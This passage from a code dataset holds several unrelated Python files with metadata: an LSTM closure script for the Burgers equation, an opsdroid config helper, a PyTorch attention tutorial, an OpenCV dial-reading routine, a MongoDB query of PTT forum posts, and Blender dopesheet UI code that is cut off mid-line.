joblib.load(filename) \nfilename = 'LSTM Model/LP_output_scaler_'+str(npt)+'.save'\nscalerOut = joblib.load(filename) \n\nuLSTM = np.zeros((7,ns+1,nx+1))\n\nfor kk in range(7):\n nxb= int((kk+1)*nx/8)\n \n xTest = xi[kk,:,:]\n yTest = yi[kk,:,:]\n xtest = np.zeros((1,lookback,2*npt+1)) \n \n # Initializing\n uu = np.zeros(nx-nxb+1)\n uu[0] = 1.0\n u1 = np.zeros(nx-nxb+1)\n u1[0] = 1.0\n uLSTM[kk,0,nxb:] = uu\n for i in range(lookback):\n temp = xTest[i,:]\n temp = temp.reshape(1,-1)\n xtest[0,i,:] = scalerIn.transform(temp) \n \n # Prediction\n for i in range(lookback,ns+1):\n ytest = model.predict(xtest)\n ytest = scalerOut.inverse_transform(ytest) # rescale \n \n # integrate one time step || RK3 scheme\n # first step \n rr = rhsR(nx,dx,nu1,nu2,g1,g2,nxb,uu)\n u1[1:nx] = uu[1:nx] + dt*rr[1:nx]\n \n # second step\n rr = rhsR(nx,dx,nu1,nu2,g1,g2,nxb,u1)\n u1[1:nx] = 0.75*uu[1:nx] + 0.25*u1[1:nx] + 0.25*dt*rr[1:nx]\n \t\n # third step\n rr = rhsR(nx,dx,nu1,nu2,g1,g2,nxb,u1)\n uu[1:nx] = 1.0/3.0*uu[1:nx] + 2.0/3.0*u1[1:nx] + 2.0/3.0*dt*rr[1:nx]\n uu[0] = ytest\n u1[0] = ytest\n \n uLSTM[kk,i,nxb:] = uu\n print([kk,i])\n \n # Update xtest\n for k in range(lookback-1):\n xtest[0,k,:] = xtest[0,k+1,:]\n tmp = np.copy(xTest[i,:])\n tmp[0:npt] = uu[0:npt] \n tmp = tmp.reshape(1,-1)\n xtest[0,lookback-1,:] = scalerIn.transform(tmp) 
\n\nnp.save('./Data/uFOM.npy',uFOM)\nnp.save('./Data/uLP_'+str(npt)+'.npy',uLSTM)\n\n\n", "sub_path": "1_1D Burgers [Ex1 and Ex2]/1_Right travelling wave [Ex1]/2_Burgers_Square_LP_closure.py", "file_name": "2_Burgers_Square_LP_closure.py", "file_ext": "py", "file_size_in_byte": 8263, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "numpy.random.seed", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.random.set_seed", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 133, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 146, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 155, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 169, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 172, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 173, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 176, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.semilogy", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 194, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.semilogy", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, 
"usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "joblib.dump", "line_number": 208, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 210, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 215, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 219, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 275, "usage_type": "call"}]} {"seq_id": "398631192", "text": "\"\"\"Helper functions to use within OpsDroid.\"\"\"\n\nimport os\nimport stat\nimport shutil\nimport logging\nimport filecmp\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef get_opsdroid():\n \"\"\"Return the running opsdroid instance.\"\"\"\n from opsdroid.core import OpsDroid\n if len(OpsDroid.instances) == 1:\n return OpsDroid.instances[0]\n\n return None\n\n\ndef del_rw(action, name, exc):\n \"\"\"Error handler for removing read only files.\"\"\"\n os.chmod(name, stat.S_IWRITE)\n os.remove(name)\n\n# This is meant to provide backwards compatibility for versions\n# prior to 0.12.0 in the future this will probably be deleted\n\n\ndef move_config_to_appdir(src, dst):\n \"\"\"Copy any .yaml extension in \"src\" to \"dst\" and remove from \"src\".\"\"\"\n yaml_files = [file for file in os.listdir(src)\n if '.yaml' in file[-5:]]\n\n if not os.path.isdir(dst):\n os.mkdir(dst)\n\n for file in yaml_files:\n original_file = os.path.join(src, file)\n copied_file = os.path.join(dst, file)\n shutil.copyfile(original_file, copied_file)\n _LOGGER.info(_('File %s copied from %s to %s '\n 'run opsdroid -e to edit the '\n 'main config file'), file,\n src, dst)\n if filecmp.cmp(original_file, copied_file):\n os.remove(original_file)\n", "sub_path": "opsdroid/helper.py", "file_name": "helper.py", "file_ext": "py", "file_size_in_byte": 1339, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "opsdroid.core.OpsDroid.instances", "line_number": 15, "usage_type": "attribute"}, {"api_name": "opsdroid.core.OpsDroid", "line_number": 15, "usage_type": "name"}, {"api_name": "opsdroid.core.OpsDroid.instances", "line_number": 16, "usage_type": "attribute"}, {"api_name": "opsdroid.core.OpsDroid", "line_number": 16, "usage_type": "name"}, {"api_name": "os.chmod", "line_number": 23, "usage_type": "call"}, {"api_name": "stat.S_IWRITE", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 24, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": 
"attribute"}, {"api_name": "os.mkdir", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 41, "usage_type": "call"}, {"api_name": "filecmp.cmp", "line_number": 46, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 47, "usage_type": "call"}]} {"seq_id": "359334938", "text": "import sentencepiece as spm\nimport torch\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport torch.nn as nn\n# vocab loading\nvocab_file = \"/Users/a60058238/Desktop/dev/workspace/nlp-study/Data/kowiki/kowiki.model\"\nvocab = spm.SentencePieceProcessor()\nvocab.load(vocab_file)\n\n# 입력 texts\nlines = [\n \"겨울은 추워요.\",\n \"감기 조심하세요.\"\n]\n\n# text를 tensor로 변환\ninputs = []\nfor line in lines:\n pieces = vocab.encode_as_pieces(line)\n ids = vocab.encode_as_ids(line)\n inputs.append(torch.tensor(ids))\n print(pieces)\n\n# 입력 길이가 다르므로 입력 최대 길이에 맟춰 padding(0)을 추가 해 줌\ninputs = torch.nn.utils.rnn.pad_sequence(inputs, batch_first=True, padding_value=0)\n# shape\nprint(inputs.size())\n# 값\nprint(inputs)\n\nn_vocab = len(vocab) # vocab count\nd_hidn = 128 # hidden size\nnn_emb = torch.nn.Embedding(n_vocab, d_hidn) # embedding 객체\n\ninput_embs = nn_emb(inputs) # input embedding\nprint(input_embs.size())\n\n\"\"\" sinusoid position embedding \"\"\"\ndef get_sinusoid_encoding_table(n_seq, d_hidn):\n def cal_angle(position, i_hidn):\n return position / np.power(10000, 2 * (i_hidn // 2) / d_hidn)\n def get_posi_angle_vec(position):\n return [cal_angle(position, i_hidn) for i_hidn in range(d_hidn)]\n\n sinusoid_table = np.array([get_posi_angle_vec(i_seq) for i_seq in range(n_seq)])\n sinusoid_table[:, 0::2] = np.sin(sinusoid_table[:, 0::2]) # even index sin\n sinusoid_table[:, 1::2] = np.cos(sinusoid_table[:, 1::2]) # odd index cos\n\n return sinusoid_table\n\n# position encoding 구하는 절\nn_seq = 64\npos_encoding = get_sinusoid_encoding_table(n_seq, d_hidn)\n\nprint (pos_encoding.shape) # 크기 출력\nplt.pcolormesh(pos_encoding, cmap='RdBu')\nplt.xlabel('Depth')\nplt.xlim((0, d_hidn))\nplt.ylabel('Position')\nplt.colorbar()\nplt.show()\n\npos_encoding = torch.FloatTensor(pos_encoding)\nnn_pos = torch.nn.Embedding.from_pretrained(pos_encoding, freeze=True)\n\npositions = torch.arange(inputs.size(1), device=inputs.device, dtype=inputs.dtype).expand(inputs.size(0), inputs.size(1)).contiguous() + 1\npos_mask = inputs.eq(0)\n\npositions.masked_fill_(pos_mask, 0)\npos_embs = nn_pos(positions) # position embedding\n\nprint(inputs)\nprint(positions)\nprint(pos_embs.size())\n\n# Transformer에 사용될 입력\n# input embedding과 postion embedding의 합으로 input_sums 생\ninput_sums = input_embs + pos_embs\n\n#Scale Dot Product Attention에서 입력으로 사용될 Q, K, V\n# Scale Dot Product Attention의 경우 MatMul(softmax(mask(scale(matmul(Q,K), V)\n#\nQ = input_sums\nK = input_sums\nV = input_sums\nattn_mask = inputs.eq(0).unsqueeze(1).expand(Q.size(0), Q.size(1), K.size(1))\nprint(attn_mask.size())\nprint(attn_mask[0])\n\n# softmax(Q * k^T / K-dimension) * V 수식의 Q * K-transpose 계산분\n# matmul(Q,K) 부분\nscores = torch.matmul(Q, K.transpose(-1, -2))\nprint(scores.size())\nprint(scores[0])\n\n# softmax(Q * k^T / K-dimension) * V 수식의 d_head**0.5\n# scale 하는 부\nd_head = 64\nscores = 
scores.mul_(1/d_head**0.5)\nprint(scores.size())\nprint(scores[0])\n\n# the Mask(opt) part\nscores.masked_fill_(attn_mask, -1e9)\nprint(scores.size())\nprint(scores[0])\n\n#Softmax\nattn_prob = nn.Softmax(dim=-1)(scores)\nprint(attn_prob.size())\nprint(attn_prob[0])\n\n# attn_prob * V\n# attn_prob corresponds to the softmax(mask(scale(matmul(Q,K)))) part of\n# MatMul(softmax(mask(scale(matmul(Q,K)))), V).\ncontext = torch.matmul(attn_prob, V)\nprint(context.size())\nn_head = 2  # number of attention heads (d_hidn = n_head * d_head)\nbatch_size = Q.size(0)  # batch size for the multi-head reshape below\nW_Q = nn.Linear(d_hidn, n_head * d_head)\nW_K = nn.Linear(d_hidn, n_head * d_head)\nW_V = nn.Linear(d_hidn, n_head * d_head)\n\n# (bs, n_seq, n_head * d_head)\nq_s = W_Q(Q)\nprint(q_s.size())\n# (bs, n_seq, n_head, d_head)\nq_s = q_s.view(batch_size, -1, n_head, d_head)\nprint(q_s.size())\n# (bs, n_head, n_seq, d_head)\nq_s = q_s.transpose(1,2)\nprint(q_s.size())\n\n\n\n\n", "sub_path": "ETC/inputEmbedding.py", "file_name": "inputEmbedding.py", "file_ext": "py", "file_size_in_byte": 3807, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sentencepiece.SentencePieceProcessor", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.power", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.pcolormesh", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn.Embedding.from_pretrained", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.arange", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn.Softmax", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 121, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 
122, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 122, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 123, "usage_type": "name"}]} {"seq_id": "397893605", "text": "import numpy as np\nimport cv2\n\n\ndef main_process(img, center_tally):\n mask_zero_area = create_mask_zero_area(img, center_tally)\n zero_area_binary = create_binary(mask_zero_area, img)\n zero_coords = get_zero_coordinates(zero_area_binary)\n\n if zero_coords is None:\n return center_tally\n return zero_coords\n\n\ndef create_mask_zero_area(img, center_tally):\n W, H = img.shape[:2]\n mask = np.zeros((W, H), np.uint8)\n\n size_boundaries = int(W * 0.015)\n\n mask[\n center_tally[1] - size_boundaries: center_tally[1],\n center_tally[0] - size_boundaries: center_tally[0] + size_boundaries] = 1\n\n return mask\n\n\ndef create_binary(mask_zero_area, img):\n\n img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n channels = cv2.split(img_hsv)\n value = channels[2] * mask_zero_area\n\n mean_masked_value = np.mean(np.ma.masked_where(value == 0, value))\n std_masked_value = np.std(np.ma.masked_where(value == 0, value))\n\n bin = cv2.inRange(value, 0, mean_masked_value - (1.5 * std_masked_value)) * mask_zero_area\n\n return bin\n\n\ndef get_zero_coordinates(zero_binary_area):\n\n contours, hir = cv2.findContours(zero_binary_area, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE) # Contour Detection\n\n if len(contours) is 0:\n return None\n\n areas = [cv2.contourArea(c) for c in contours]\n max_index = np.argmax(areas)\n cnt = contours[max_index]\n\n M = cv2.moments(cnt)\n try:\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n return (cx, cy)\n except Exception:\n return None\n\n", "sub_path": "backend/processing/image_processing/dial/zero.py", "file_name": "zero.py", "file_ext": "py", "file_size_in_byte": 1573, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 17, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.split", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.ma.masked_where", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.std", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.ma.masked_where", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 35, "usage_type": "attribute"}, {"api_name": "cv2.inRange", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 44, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_NONE", "line_number": 44, "usage_type": "attribute"}, {"api_name": "cv2.contourArea", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.moments", "line_number": 53, "usage_type": "call"}]} {"seq_id": "262115677", "text": "import pymongo\nfrom pymongo import MongoClient\n\ndef main():\n\t# parseAuthor('OtsukaAi')\n\t#queryUser('OtsukaAi', 'myhome6206')\n\tqueryUser('Gossiping', 
'blza')\n\ndef queryUser(board, username):\n\tclient = MongoClient('localhost', 27017)\n\tcollection = client['Ptt']['Weekarticle' + board]\n\n\tuser_record = collection.find({\n\t\t'$or':[\n\t\t\t{'author.account': username},\n\t\t\t{'messages':{\n\t\t\t\t\t'$elemMatch':{'push_userid': username}\n\t\t\t}}\n\t\t]\n\t}).sort('date', pymongo.DESCENDING)\n\treturn user_record\n\n\t#for record in user_record:\n\t#\tprint record['article_title'], record['date']\n\nif __name__ == '__main__':\n\tmain()", "sub_path": "web/Pttuser.py", "file_name": "Pttuser.py", "file_ext": "py", "file_size_in_byte": 602, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pymongo.MongoClient", "line_number": 10, "usage_type": "call"}, {"api_name": "pymongo.DESCENDING", "line_number": 20, "usage_type": "attribute"}]} {"seq_id": "334960945", "text": "# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\nimport bpy\nfrom bpy.types import (\n Header,\n Menu,\n Panel,\n)\n\n#######################################\n# DopeSheet Filtering - Header Buttons\n\n# used for DopeSheet, NLA, and Graph Editors\n\n\ndef dopesheet_filter(layout, context, generic_filters_only=False):\n dopesheet = context.space_data.dopesheet\n is_nla = context.area.type == 'NLA_EDITOR'\n\n row = layout.row(align=True)\n row.prop(dopesheet, \"show_only_selected\", text=\"\")\n row.prop(dopesheet, \"show_hidden\", text=\"\")\n\n if is_nla:\n row.prop(dopesheet, \"show_missing_nla\", text=\"\")\n else: # graph and dopesheet editors - F-Curves and drivers only\n row.prop(dopesheet, \"show_only_errors\", text=\"\")\n\n if not generic_filters_only:\n if bpy.data.collections:\n row = layout.row(align=True)\n row.prop(dopesheet, \"filter_collection\", text=\"\")\n\n if not is_nla:\n row = layout.row(align=True)\n row.prop(dopesheet, \"filter_fcurve_name\", text=\"\")\n else:\n row = layout.row(align=True)\n row.prop(dopesheet, \"filter_text\", text=\"\")\n\n#######################################\n# Dopesheet Filtering Popovers\n\n# Generic Layout - Used as base for filtering popovers used in all animation editors\n# Used for DopeSheet, NLA, and Graph Editors\n\n\nclass DopesheetFilterPopoverBase:\n bl_region_type = 'HEADER'\n bl_label = \"Filters\"\n\n # Generic = Affects all datatypes\n # XXX: Perhaps we want these to stay in the header instead, for easy/fast access\n @classmethod\n def draw_generic_filters(cls, context, layout):\n dopesheet = context.space_data.dopesheet\n is_nla = context.area.type == 'NLA_EDITOR'\n\n col = layout.column(align=True)\n col.prop(dopesheet, \"show_only_selected\", icon='NONE')\n col.prop(dopesheet, \"show_hidden\", icon='NONE')\n\n if is_nla:\n col.prop(dopesheet, \"show_missing_nla\", icon='NONE')\n else: # 
graph and dopesheet editors - F-Curves and drivers only\n col.prop(dopesheet, \"show_only_errors\", icon='NONE')\n\n # Name/Membership Filters\n # XXX: Perhaps these should just stay in the headers (exclusively)?\n @classmethod\n def draw_search_filters(cls, context, layout, generic_filters_only=False):\n dopesheet = context.space_data.dopesheet\n is_nla = context.area.type == 'NLA_EDITOR'\n\n col = layout.column(align=True)\n col.label(text=\"With Name:\")\n if not is_nla:\n row = col.row(align=True)\n row.prop(dopesheet, \"filter_fcurve_name\", text=\"\")\n else:\n row = col.row(align=True)\n row.prop(dopesheet, \"filter_text\", text=\"\")\n\n if (not generic_filters_only) and (bpy.data.collections):\n col = layout.column(align=True)\n col.label(text=\"In Collection:\")\n col.prop(dopesheet, \"filter_collection\", text=\"\")\n\n # Standard = Present in all panels\n @classmethod\n def draw_standard_filters(cls, context, layout):\n dopesheet = context.space_data.dopesheet\n\n # datablock filters\n layout.label(text=\"Filter by Type:\")\n flow = layout.grid_flow(row_major=True, columns=2, even_rows=False, align=False)\n\n flow.prop(dopesheet, \"show_scenes\", text=\"Scenes\")\n flow.prop(dopesheet, \"show_nodes\", text=\"Node Trees\")\n\n # object types\n if bpy.data.armatures:\n flow.prop(dopesheet, \"show_armatures\", text=\"Armatures\")\n if bpy.data.cameras:\n flow.prop(dopesheet, \"show_cameras\", text=\"Cameras\")\n if bpy.data.grease_pencil:\n flow.prop(dopesheet, \"show_gpencil\", text=\"Grease Pencil Objects\")\n if bpy.data.lights:\n flow.prop(dopesheet, \"show_lights\", text=\"Lights\")\n if bpy.data.meshes:\n flow.prop(dopesheet, \"show_meshes\", text=\"Meshes\")\n if bpy.data.curves:\n flow.prop(dopesheet, \"show_curves\", text=\"Curves\")\n if bpy.data.lattices:\n flow.prop(dopesheet, \"show_lattices\", text=\"Lattices\")\n if bpy.data.metaballs:\n flow.prop(dopesheet, \"show_metaballs\", text=\"Metaballs\")\n\n # data types\n flow.prop(dopesheet, \"show_worlds\", text=\"Worlds\")\n if bpy.data.particles:\n flow.prop(dopesheet, \"show_particles\", text=\"Particles\")\n if bpy.data.linestyles:\n flow.prop(dopesheet, \"show_linestyles\", text=\"Line Styles\")\n if bpy.data.speakers:\n flow.prop(dopesheet, \"show_speakers\", text=\"Speakers\")\n if bpy.data.materials:\n flow.prop(dopesheet, \"show_materials\", text=\"Materials\")\n if bpy.data.textures:\n flow.prop(dopesheet, \"show_textures\", text=\"Textures\")\n if bpy.data.shape_keys:\n flow.prop(dopesheet, \"show_shapekeys\", text=\"Shape Keys\")\n if bpy.data.cache_files:\n flow.prop(dopesheet, \"show_cache_files\", text=\"Cache Files\")\n\n layout.separator()\n\n # Object Data Filters\n\n # TODO: Add per-channel/axis convenience toggles?\n split = layout.split()\n\n col = split.column()\n col.prop(dopesheet, \"show_transforms\", text=\"Transforms\")\n\n col = split.column()\n col.prop(dopesheet, \"show_modifiers\", text=\"Modifiers\")\n\n layout.separator()\n\n # performance-related options (users will mostly have these enabled)\n col = layout.column(align=True)\n col.label(text=\"Options:\")\n col.prop(dopesheet, \"use_datablock_sort\", icon='NONE')\n\n\n# Popover for Dopesheet Editor(s) - Dopesheet, Action, Shapekey, GPencil, Mask, etc.\nclass DOPESHEET_PT_filters(DopesheetFilterPopoverBase, Panel):\n bl_space_type = 'DOPESHEET_EDITOR'\n bl_region_type = 'HEADER'\n bl_label = \"Filters\"\n\n def draw(self, context):\n layout = self.layout\n\n dopesheet = context.space_data.dopesheet\n ds_mode = 
context.space_data.mode\n\n layout.prop(dopesheet, \"show_summary\", text=\"Summary\")\n\n DopesheetFilterPopoverBase.draw_generic_filters(context, layout)\n\n if ds_mode in {'DOPESHEET', 'ACTION', 'GPENCIL'}:\n layout.separator()\n generic_filters_only = ds_mode != 'DOPESHEET'\n DopesheetFilterPopoverBase.draw_search_filters(context, layout,\n generic_filters_only=generic_filters_only)\n\n if ds_mode == 'DOPESHEET':\n layout.separator()\n DopesheetFilterPopoverBase.draw_standard_filters(context, layout)\n\n\n#######################################\n# DopeSheet Editor - General/Standard UI\n\nclass DOPESHEET_HT_header(Header):\n bl_space_type = 'DOPESHEET_EDITOR'\n\n def draw(self, context):\n layout = self.layout\n\n st = context.space_data\n\n row = layout.row(align=True)\n row.template_header()\n\n if st.mode == 'TIMELINE':\n from .space_time import (\n TIME_MT_editor_menus,\n TIME_HT_editor_buttons,\n )\n TIME_MT_editor_menus.draw_collapsible(context, layout)\n TIME_HT_editor_buttons.draw_header(context, layout)\n else:\n layout.prop(st, \"ui_mode\", text=\"\")\n\n DOPESHEET_MT_editor_menus.draw_collapsible(context, layout)\n DOPESHEET_HT_editor_buttons.draw_header(context, layout)\n\n\n# Header for \"normal\" dopesheet editor modes (e.g. Dope Sheet, Action, Shape Keys, etc.)\nclass DOPESHEET_HT_editor_buttons(Header):\n bl_idname = \"DOPESHEET_HT_editor_buttons\"\n bl_space_type = 'DOPESHEET_EDITOR'\n bl_label = \"\"\n\n def draw(self, context):\n pass\n\n @staticmethod\n def draw_header(context, layout):\n st = context.space_data\n tool_settings = context.tool_settings\n\n if st.mode in {'ACTION', 'SHAPEKEY'}:\n # TODO: These buttons need some tidying up -\n # Probably by using a popover, and bypassing the template_id() here\n row = layout.row(align=True)\n row.operator(\"action.layer_prev\", text=\"\", icon='TRIA_DOWN')\n row.operator(\"action.layer_next\", text=\"\", icon='TRIA_UP')\n\n row = layout.row(align=True)\n row.operator(\"action.push_down\", text=\"Push Down\", icon='NLA_PUSHDOWN')\n row.operator(\"action.stash\", text=\"Stash\", icon='FREEZE')\n\n layout.separator_spacer()\n\n layout.template_ID(st, \"action\", new=\"action.new\", unlink=\"action.unlink\")\n\n layout.separator_spacer()\n\n if st.mode == 'DOPESHEET':\n dopesheet_filter(layout, context)\n elif st.mode == 'ACTION':\n # 'generic_filters_only' limits the options to only the relevant 'generic' subset of\n # filters which will work here and are useful (especially for character animation)\n dopesheet_filter(layout, context, generic_filters_only=True)\n elif st.mode == 'GPENCIL':\n row = layout.row(align=True)\n row.prop(st.dopesheet, \"show_gpencil_3d_only\", text=\"Active Only\")\n\n if st.dopesheet.show_gpencil_3d_only:\n row = layout.row(align=True)\n row.prop(st.dopesheet, \"show_only_selected\", text=\"\")\n row.prop(st.dopesheet, \"show_hidden\", text=\"\")\n\n row = layout.row(align=True)\n row.prop(st.dopesheet, \"filter_text\", text=\"\")\n\n layout.popover(\n panel=\"DOPESHEET_PT_filters\",\n text=\"\",\n icon='FILTER',\n )\n\n # Grease Pencil mode doesn't need snapping, as it's frame-aligned only\n if st.mode != 'GPENCIL':\n layout.prop(st, \"auto_snap\", text=\"\")\n\n row = layout.row(align=True)\n row.prop(tool_settings, \"use_proportional_action\", text=\"\", icon_only=True)\n sub = row.row(align=True)\n sub.active = tool_settings.use_proportional_action\n sub.prop(tool_settings, \"proportional_edit_falloff\", 